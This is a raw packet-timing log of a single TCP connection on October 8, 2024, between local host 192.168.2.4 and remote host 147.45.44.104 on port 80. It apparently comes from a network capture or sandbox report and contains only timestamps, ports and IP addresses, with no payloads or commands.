                                                  Oct 8, 2024 03:30:55.754030943 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754064083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754105091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754121065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754151106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754159927 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754168034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754184008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754201889 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754208088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754225969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754240036 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754244089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754261971 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754285097 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754288912 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754326105 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754336119 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754343987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754362106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754383087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754383087 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754412889 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754422903 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754431009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754457951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754466057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754476070 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754492044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754508018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754513979 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754527092 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754543066 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754547119 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754579067 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754602909 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754620075 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754635096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754652977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754654884 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754668951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754693031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754734993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754751921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754767895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754775047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754786968 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754802942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754803896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754842043 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754863977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754892111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754909992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754925966 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754937887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.754942894 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.754964113 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755006075 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755023003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755038023 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755047083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755055904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755072117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755074024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755089998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755106926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755114079 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755143881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755167961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755183935 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755211115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755222082 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755228996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755245924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755261898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755264997 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755279064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755296946 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755297899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755316019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755332947 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755498886 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755517006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755532026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755548000 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755548954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755568027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755574942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755584955 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755605936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755606890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755634069 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755644083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755656004 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755671978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755688906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755695105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755712032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755726099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755731106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755748987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755765915 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755769014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755783081 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755800009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755800962 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755815029 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755836010 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755878925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755894899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755911112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755918026 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755928993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755947113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755948067 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755963087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755980015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.755985022 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.755995989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756011963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756016970 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756028891 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756050110 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756139040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756155014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756171942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756181002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756181002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756189108 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756206989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756222963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756239891 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756249905 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756249905 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756272078 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756282091 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756299973 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756315947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756330967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756335974 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756350040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756370068 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756376982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756392956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756408930 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756413937 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756424904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756444931 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.806931019 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.843832970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843857050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843873978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843889952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843908072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843924046 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843941927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844037056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844037056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844037056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844366074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844382048 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844410896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844412088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844427109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844444990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844450951 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844461918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844480038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844481945 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844516039 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844599009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844619036 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844635963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844655037 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844661951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844677925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844691992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844700098 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844708920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844724894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844738007 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844758987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844774008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844784021 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844790936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844809055 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844810009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844839096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844850063 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844856977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844872952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844888926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844892979 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844909906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844937086 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844940901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844957113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844971895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844983101 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844989061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845005989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845010996 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845022917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845042944 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845082045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845096111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845110893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845120907 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845129013 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845144033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845149040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845170975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845180988 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845186949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845204115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845220089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845225096 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845247984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845257998 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845266104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845283031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845299006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845302105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845316887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845334053 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845411062 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845426083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845444918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845448017 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845462084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845480919 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845490932 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845506907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845521927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845532894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845552921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845561981 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845570087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845586061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845606089 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845614910 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845628977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845644951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845649958 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845662117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845679045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845684052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845695972 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845714092 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845716000 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845756054 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845777035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845792055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845817089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845828056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845834970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845851898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845868111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845873117 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845884085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845900059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845904112 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845936060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845973015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845988989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846004009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846029043 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846031904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846050024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846065998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846069098 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846082926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846097946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846101046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846115112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846137047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846163034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846179962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846199989 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846330881 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846347094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846363068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846368074 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846379995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846395969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846396923 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846411943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846427917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846436024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846447945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846463919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846466064 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846479893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846496105 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846501112 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846513033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846530914 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846533060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846566916 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846585035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846600056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846613884 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846630096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846636057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846646070 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846662998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846667051 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846679926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846698999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846703053 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846744061 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846754074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846771955 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846786976 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846805096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846808910 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846822977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846838951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846838951 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846865892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846884966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846924067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846951008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846965075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846970081 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846987963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847003937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847006083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.847021103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847037077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847040892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.847054005 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847070932 CEST8049730147.45.44.104192.168.2.4
